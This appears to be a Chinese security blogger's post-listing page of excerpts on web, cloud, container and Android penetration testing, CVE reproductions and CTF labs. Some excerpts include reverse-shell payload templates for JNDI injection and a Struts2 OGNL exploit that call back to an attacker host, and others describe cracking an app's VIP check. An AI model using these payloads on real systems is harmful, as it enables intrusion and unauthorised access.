- 博客(40)
- 收藏
- 关注
RSS订阅原创 云上攻防--云原生&&Docker逃逸--特权逃逸--危险挂载--漏洞逃逸
Docker 是一个开放源代码软件,是一个开放平台,用于开发应用、交付(shipping)应用、运行应用。Docker允许用户将基础设施(Infrastructure)中的应用单独分割出来,形成更小的颗粒(容器),从而提高交付软件的速度。Docker 容器与虚拟机类似,但二者在原理上不同,容器是将操作系统层虚拟化,虚拟机则是虚拟化硬件,因此容器更具有便携性、高效地利用服务器。
2024-01-10 15:30:20
1602
原创 云上攻防--云服务&&对象存储(域名接管)&&弹性计算(元数据泄露)
实例元数据(metadata)包含了弹性计算云服务器实例在阿里云系统中的信息,您可以在运行中的实例内方便地查看实例元数据,并基于实例元数据配置或管理实例。对象存储可以配置域名映射,接管域名即是Bucket存储桶绑定域名后,访问域名即访问对象存储中的存储桶,当存储桶被删除而域名解析未删除,访问域名时候显示关键信息NoSuchBucket时可以尝试接管。访问控制是云厂商提供的一种运维手段,可以将管理员用户的权限进行拆分,将部分权限交给其他用户。每个厂商的服务器都存在元数据,但是各个厂商的获取元数据的地址不同。
2023-12-29 14:33:59
1349
原创 Ubuntu部署雷池Waf社区版
添加后,在客户端执行 curl -H “Host: <域名>” http://<雷池 IP>:<雷池监听端口> ,若能获取到业务网站的响应,并且站点上 “今日访问量” 增加,则代表配置成功。/root/.docker/cli-plugins下命名为docker-compose,这样就省略第三条命令。对目标网站进行测试,例如手动测试sql注入、xss等,如果出现防护界面及说明册成功防护。使用命令下载太慢得话可以下载下来然后传到服务器中,然后将文件移动至。将目标服务器的网站端口只对部署有雷池的ip开放即可。
2023-11-10 08:39:16
983
原创 APP攻防--安卓逆向&JEB动态调试&LSPosed模块&算法提取&Hook技术
在算法助手功能中有一项功能可以添加自定义hook所谓hook技术,通俗来讲就是可以改变程序得执行逻辑,类似与bp抓包得时候修改数据包再将数据包放出,hook可以将程序中得变量或者返回值进行修改。在添加hook时,需要将关键程序得执行逻辑搞清楚,将关键变量或者返回值进行修改。例如在之前案例中得某小说APP中,通过关键字定位到关键逻辑,进行反编译后分析程序执行逻辑if语句是否执行根据y5得返回值来判断,如果y5得返回值为true,即可成功进入if语句。
2023-11-07 14:23:04
3074
2
原创 APP攻防--安卓逆向&数据修改&逻辑修改&视图修改
目标APP开通vip的方式类似于Web中的前端校验绕过,这里实现的方法是固定返回数据包,将身份证明的数据包进行修改,并通过抓包工具将APP每次请求服务器的数据包都进行修改。通过loadAd这个方法名大致意思为加载Activyity的意思,这里的0x3e9是1001 的十进制表示,而 0xbb8则是3000 的十进制表示 ,这里代码的意思是1秒到3秒的时间间隔,尝试将这两个值修改为0。搜索结果如下,由于dex文件所写的为APP运行逻辑,开通vip的这件事情是逻辑修改,因此优先查看dex文件。
2023-11-01 14:14:44
2506
1
原创 APP攻防--反模拟器&反代理&反证书&真机逃逸&XP框架&Frida技术
关于APP抓包,使用burpsuite抓模拟器中的数据包,需要将模拟器中的网络设置代理,代理地址为burpsuite监听的地址与端口,要想成功获取https数据包,需要将burpsuite证书导入模拟器中,在Android7.0之后的系统需要将证书导入系统认证,具体操作参考。Hook 技术又叫做钩子函数,在系统没有调用该函数之前,钩子程序就先捕获该消息,钩子函数先得到控制权,这时钩子函数既可以加工处理(改变)该函数的执行行为,还可以强制结束消息的传递。设置模拟器网络代理,转发至burpsuite。
2023-10-20 09:54:42
1716
1
原创 Jackson--FastJson--XStream--代码执行&&反序列化
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “bash -c {echo,base64反弹shell命令}|{base64,-d}|{bash,-i}” -A 攻击机地址。将xml类型payload替换使用JNDI工具生成的class文件地址发送至目标服务器接受解析。将JRMP监听地址替换xml型payload,抓包发送至目标服务器解析xml格式处。在利用该版本范围时,只能通过项目中所调用的模块和本身类文件来进行利用。
2023-10-17 14:50:32
347
原创 Solr Shiro Log4j2 命令执行--文件读取--反序列化--身份权限绕过--命令执行
Apache Velocity是一个基于Java的模板引擎,它提供了一个模板语言去引用由Java代码定义的对象。Velocity是Apache基金会旗下的一个开源软件项目,旨在确保Web应用程序在表示层和业务逻辑层之间的隔离(即MVC设计模式)。Apache Solr 5.0.0版本至8.3.1版本中存在输入验证错误漏洞。攻击者可借助自定义的Velocity模板功能,利用Velocity-SSTI漏洞在Solr系统上执行任意代码。
2023-10-10 10:57:31
308
原创 Spring Boot 目录遍历--表达式注入--代码执行--(CVE-2021-21234)&&(CVE-2022-22963)&&(CVE-2022-22947)&&(CVE-2022-2296)
spring-boot-actuator-logview 是一个简单的日志文件查看器作为Spring Boot执行器端点,在 0.2.13 版本之前存在着目录遍历漏洞,编号 CVE-2021-21234。漏洞本质是Spring Boot 执行器通过请求的参数来指定文件名和文件夹路径,经过组合拼接达到目录遍历,虽然源码中检查了文件名(filename)参数来防止目录遍历,但是没有检查文件夹(base)参数,造成了目录遍历。
2023-09-26 08:45:39
721
原创 thinkphp lang命令执行--struts2 代码执行--(QVD-2022-46174)&&(CVE-2020-17530)&&(CVE-2021-31805)
(%23application.get(‘org.apache.tomcat.InstanceManager’).newInstance(‘freemarker.template.utility.Execute’).exec({‘bash -c {echo,反弹shell命令base64编码加url编码}|{base64,-d}|{bash,-i}’}))
2023-09-26 08:42:43
236
原创 Jenkins 命令执行 -- jetty 敏感信息泄露 --(CVE-2021-2816)&&(CVE-2017-1000353)&&(CVE-2018-1000861)
对于
2023-09-25 10:17:25
1155
原创 Tomcat--文件上传--文件包含--(CVE-2017-12615)&&(CVE-2020-1938)
当存在漏洞的Tomcat运行在Windows/Linux主机上, 且启用了HTTP PUT请求方法( 例如, 将readonly初始化参数由默认值设置为false) , 攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的JSP的webshell文件,JSP文件中的恶意代码将能被服务器执行, 导致服务器上的数据泄露或获取服务器权限。
2023-09-24 17:39:07
202
原创 Apache(2.4.49 2.4.50)--目录遍历--命令执行--(CVE-2021-42013)&&(CVE-2021-41773)
Apache HTTP Server是美国阿帕奇(Apache)基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点,发现 Apache HTTP Server 2.4.50 中针对 CVE-2021-41773 的修复不够充分。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置“要求全部拒绝”的保护,则这些请求可能会成功。如果还为这些别名路径启用了 CGI 脚本,则这可能允许远程代码执行。
2023-09-22 16:30:43
98
原创 Couchdb-权限绕过--命令执行--(CVE-2017-12635)&&(CVE-2017-12636)--H2database命令执行--(CVE-2022-23221)
采用Vulfocus靶场环境进行复现,搭建操作和文章参考具体搭建教程参考vulfocus不能同步的解决方法/vulfocus同步失败。Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。
2023-09-22 14:21:53
286
原创 Redis漏洞总结--未授权--沙箱绕过--(CNVD-2015-07557)&&(CNVD-2019-21763)&&(CVE-2022-0543)
由于在Reids 4.x及以上版本中新增了模块功能,攻击者可通过外部拓展,在Redis中实现一个新的Redis命令。攻击者可以利用该功能引入模块,在未授权访问的情况下使被攻击服务器加载恶意.so 文件,从而实现远程代码执行。对于Redis服务的未授权访问,首先需要确认Redis未授权是否存在,使用Redis数据库客户端进行连接测试,如何没有密码,即未授权漏洞存在。漏洞利用有三种利用方式,每种方式都有限制条件,本质就是使用Redis数据库操作语句在目标主机进行写入文件。注意:部分没目录权限读写权限。
2023-09-22 14:20:59
1269
原创 JNDI注入--Log4j漏洞--Fastjson反序列化漏洞
Apache的一个开源项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;我们也可以控制每一条日志的输出格式;通过定义每一条日志信息的级别,我们能够更加细致地控制日志的生成过程。最令人感兴趣的就是,这些可以通过一个配置文件来灵活地进行配置,而不需要修改应用的代码。
2023-09-21 23:05:33
450
原创 Web攻防--Java_SQL注入--XXE注入-- SSTI模板注入--SPEL表达式注入
模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,利用模板引擎来生成前端的html代码,模板引擎会提供一套生成html代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模板+用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前。预编译技术会让数据库跳过编译阶段,也就无法就进行词法分析,关键字不会被拆开,注入语句也就不会被识别为SQL的关键字,从而防止恶意注入语句改变原有SQL语句本身逻辑。说白了就是RCE命令执行。
2023-09-21 22:53:26
306
原创 Web攻防--JS算法逆向--断点调试--反调试&&代码混淆解密--敏感信息
在进行渗透测试过程中,在一些功能点进行参数注入或者枚举爆破等过程中,会出现参数进行加密的情况,但是我们输入参数并不是加密状态,即便测试点存在漏洞也不可能测试成功,这时候便需要将所提交参数进行加密后在进行注入,针对JS应用我们可以采用JS断点调试的方法将加密算法逆向出来,再使用插件将加密后的参数进行注入。JS文件在网页中可以被查看到,为了防止源码被调试,或者关键信息泄露,会对JS代码文件进行加密混淆。JS反调试,即禁用开发者工具,防止用户查看JS源码,保护敏感数据,防止分析代码。
2023-08-31 20:49:12
2048
原创 __wakeup()魔术方法绕过(CVE-2016-7124)
在php反序列化数据过程中,如果类中存在__wakeup方法,调用 unserilize() 方法前则先调用__wakeup方法,当序列化字符串中表示对象属性个数的值大于 真实的属性个数时会跳过__wakeup的执行。
2023-08-14 17:18:40
417
原创 web攻防--PHP反序列化
序列化:把对象转换为字节序列的过程,即把对象转换为可以存储或传输的数据的过程。例如将内存中的对象转换为二进制数据流或文件,在网络传输过程中,可以是字节或是XML等格式。反序列化:把字节序列恢复为对象的过程,即把可以存储或传输的数据转换为对象的过程。例如将二进制数据流或文件加载到内存中还原为对象。
2023-08-14 17:17:25
164
原创 ctfshow--web入门--XXE
这里增加了对http关键字得过滤,可以采用编码得方式进行绕过。这里我在brup上直接编码发送没有成功,然后看了其他人得解法,用的python进行了utf-16得编码然后发包。至于为什么要这样我也不太清楚,有没有大佬知道为什么,指点一下小弟。这一关过滤了xml声明标签还有version关键字,把payload中的xml声明去掉即可。这一关和xxe-lab中很相似,直接抓包构造payload即可。这一关是无回显读取文件。
2023-07-29 19:57:03
246
原创 web攻防--xxe实体注入
XML 外部实体注入(也称为 XXE)是一种 Web 安全漏洞,允许攻击者干扰应用程序对 XML 数据的处理。它通常允许攻击者查看应用程序服务器文件系统上的文件,并与应用程序本身可以访问的任何后端或外部系统进行交互。在某些情况下,攻击者可以利用 XXE 漏洞联合执行服务器端请求伪造(SSRF) 攻击,从而提高 XXE 攻击等级以破坏底层服务器或其他后端基础设施。
2023-07-29 19:55:14
327
原创 Web通用漏洞--RCE
RCE远程代码/命令执行漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。RCE漏洞也分为代码执行漏洞和命令执行漏洞,所谓代码执行即通过漏洞点注入参数而使用源代码进行相应的操作,所谓的命令执行就是通过漏洞点注入参数使用源代码进行调用系统命令进行相关操作,从而达到执行系统命令的目的。无论是代码执行还是命令执行,两者都可以相互转换。
2023-07-28 22:50:47
437
1
原创 ctfshow--web入门--SSRF
gethostbyname()这里对url对应的ip地址进行了检测,因此不能使用短网址,域名解析等手段了,只能采用重定向的方式,构建一个重定向的网页,跳转至http://127.0.0.1/flag.php即可,然后将文件放入服务器中,去访问它即可。这里一样的方法,攻击redis数据库,默认生成的文件名为shell.php,将payload中带有百分号的部分进行二次编码然后进行传参即可。源码中要求http://ctf.开头,以show结尾才可以进行读取url。最后在check.php页面进行传参。
2023-07-09 22:00:43
382
1
原创 Web通用漏洞--SSRF
SSRF(Server-Side Request Forgery:服务器端请求伪造) 一种由攻击者构造形成由服务端发起请求的一个安全漏洞;一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)SSRF形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。
2023-07-08 23:11:43
161
原创 Web通用漏洞--CSRF
CSRF(Cross Site Request Forgery, 跨站请求伪造/客户端请求伪造),即通过伪造访问数据包并制作成网页的形式,使受害者访问伪造网页,同时触发伪造的请求而达到攻击效果的一种手段。用户首先登录网站A,生成可以对网站A进行操作的cookie信息等令牌身份验证等在未退出网站A时,恶意网站B通过诱骗等方式使得用户访问网站B当用户访问网站B的同时,网站B发送对网站A进行相关操作的数据包。即利用用户的身份向网站A进行相关操作。
2023-07-08 14:12:31
166
原创 XSS--labs通关记录
XSS–labs通关记录目录标题XSS--labs通关记录level 1(无过滤)level 2(显示框过滤)level 3(单引号闭合 焦点绕过)level 4(双引号闭合 焦点绕过)level 5(\<a>标签绕过)level 6(大小写绕过)level 7(双写绕过)level 8(unicode编码绕过)level 9(内容检测)level 10(隐藏参数绕过)level 11(referer注入)level 12(UA头注入)level 13(cookie注入)level 14(未解
2023-07-06 22:08:52
546
1
原创 Web通用漏洞--XSS
具体含义就是,如果某个 Cookie 带有 HttpOnly 属性,那么这一条 Cookie 将被禁止读取,也就是说,JavaScript 读取不到此条 Cookie,不过在与服务端交互的时候,Http Request 包中仍然会带上这个 Cookie 信息,即我们的正常交互不受影响。httponly可以防止xss会话劫持攻击。MXSS中文是突变型XSS突变型XSS,指的是原先的Payload提交是无害不会产生XSS,而由于一些特殊原因,如反编码等,导致Payload发生变异,导致的XSS。
2023-07-03 20:52:22
641
1
原创 ctfshow--web入门--文件上传
前端校验,采用修改前端代码或禁用JS等content-type校验,修改数据包中content-type值上传配置文件,修改配置进行上传上传内容检测,通过二分法测试出检测内容,使用各种姿势进行绕过文件头校验,在文件中添加符合上传规则的文件头配合文件包含,使用包含日志和包含session文件二次渲染使用脚本构建图片马配合文件包含进行上传。
2023-06-29 13:43:08
1262
1
原创 Web通用漏洞--文件包含
在项目开发过程中,开发人员通常会将重复使用的函数写入单个文件中,在使用该类函数时,直接调用文件即可,无需重新编写,这种调用文件的过程成为文件包含。在文件包含过程中,如果用户可以控制所包含的文件,则为文件包含漏洞。如果在PHP配置文件中,allow_url_include、allow_url_fopen两个选项打开的状态下可以进行远程文件包含,可以包含其他网站上的文件。LOCAL FILE INCLUDE(LFI)成为本地文件包含,顾名思义,包含文件为服务器本身的文件。
2023-06-24 00:18:33
155
1
原创 Nginx 文件名逻辑漏洞(CVE-2013-4547)(Vulhub)
在Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7版本中存在错误解析用户请求的url信息,从而导致文件代码执行,权限绕过等问题。利用该漏洞需要满足Nginx版本满足0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7版本文件上传点可以上传带空格文件名的文件服务器没有做文件重命名。
2023-06-20 16:50:58
451
原创 Apache HTTPD 换行解析漏洞(CVE-2017-15715)(Vulhub)
Apache在2.40~2.4.29版本中存在一个换行解析漏洞(\x0A),\x0A是16进制数代表10进制数字的10,在ASCII码中,\n的ASCII码为10。在Apache解析文件时,如果在php文件后缀有\x0A,Apache会忽略它,继续把它当作php来解析,但是在一些服务器的安全策略中,代码并不会忽略它。利用该漏洞需要满足三个条件Apache版本符合具有文件上传点文件名可控。
2023-06-20 11:37:24
260
原创 Web通用漏洞--文件上传
文件上传安全指的是攻击者通过利用上传实现后门的写入连接后门进行权限控制的安全问题,对于如何确保这类安全问题,一般会从原生态功能中的文件内容,文件后缀,文件类型等方面判断,但是漏洞可能不仅在本身的代码验证逻辑中出现安全问题,也会在语言版本,语言函数,中间件,引用的第三方编辑器等存在缺陷地方配合利用。另外文件上传也有多个存储逻辑,不同的文件存储方案也会给攻击者带来不一样的挑战!靶场。
2023-06-20 10:22:32
457
原创 HTTP.SYS远程代码执行漏洞验证及其复现(CVE-2015-1635蓝屏洞)
HTTP.sys是Microsoft Windows处理HTTP请求的内核驱动程序,为了优化IIS服务器性能,从IIS6.0引入,IIS服务进程依赖HTTP.sys。HTTP.sys远程代码执行漏洞实质是HTTP.sys的整数溢出漏洞。
2023-06-13 20:51:07
4430
3
原创 RHEL7破解root密码&grub菜单加密
该文件是使用以上命令所生成的密码配置文件,内容即生成的密文,账户为生成该密文的账户。为了防止使用以上方法对root用户密码进行窃取,我们可以对grub菜单进行加密。修改系统启动时grub菜单的超时时间。以上内容如有错误或瑕疵,欢迎批评指正。2. 将密码复制添加到配置文件。2. 重新生成grub配置文件。查看已安装的kernel版本。设置默认kernel启动版本。此处的用户可以是任意用户。查看selinux状态。修改系统当前运行级别。设置系统默认运行级别。获取系统默认运行级别。
2023-05-04 23:41:48
307
原创 逻辑卷的建立&磁盘阵列
LVM(Logical Volume Manager)逻辑卷管理器:使用LVM可以动态提高磁盘容量,提高磁盘管理的灵活性/boot分区不能基于LVM创建挂载LVM有两种管理方式,图形化和命令行,在生产环境中一般使用命令行的方式来管理逻辑卷磁盘阵列(Redundant Arrays of Inexpensive Disks, RAID),意思是:容错式廉价磁盘阵列。RAID 技术可以通过软件或硬件实现,将多个磁盘整合成为一个较大的磁盘装置,该装置不仅有储存功能,还具有数据保护的功能。
2023-04-18 22:36:34
2293
1
原创 Linux磁盘配额(EXT4&XFS)
磁盘配额:管理员用户可以限制某些用户、组、项目来使用磁盘空间,从而可以更好地管理磁盘。磁盘配额不能限制管理员的使用配额可以从两个方面来限制用户的使用,block即限制对磁盘容量的使用,inode节点数即限制用户可以在磁盘中所创建的文件的数量。
2023-04-14 11:56:47
4040
1
原创 Linux--rhel--centos 添加硬盘
将分区情况保存并退出,这里会提示警告,原因是因为当前磁盘正在进行使用,kernel会将分区情况写入旧的分区表,然后使用partproble /dev/sdb命令刷新该磁盘即可。首先确定要在分区建立的文件系统类型,选项-h查看帮助,选项-L可以给磁盘分区制作标签,也可以文件系统建立完成后使用e2lable给再给磁盘制作标签。第五个参数0代表是否对磁盘进行备份,0代表不备份,1代表每天进行备份,2代表不定期进行备份,这个参数一般会进行不备份,而磁盘数据可以使用压缩指令打包压缩的方式进行统一备份。
2023-04-11 21:22:26
792
1
原创 Linux--centos--rhel挂载光盘&&配置本地yum源&&配置阿里云yum源
进入此目录并创建yum源的repo文件,该路径内容为yum源的配置文件,在默认情况下所有yum的repo文件都必须放该目录下(/etc/yum.repo.d),且配置文件均以.repo结尾。编辑etc下的fstab文件,当系统启动的时候,系统会自动地从这个文件读取信息,并且会自动将此文件中指定的文件系统挂载到指定的目录。gpgcheck为验证rpm包公私钥的安全信息,1代表为验证,0代表为不验证,此项默认为验证状态。baseurl为yum源获取地址,两种方式可以获取,一种是本地获取,另一种为网络获取。
2023-04-05 14:01:29
2622
3
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人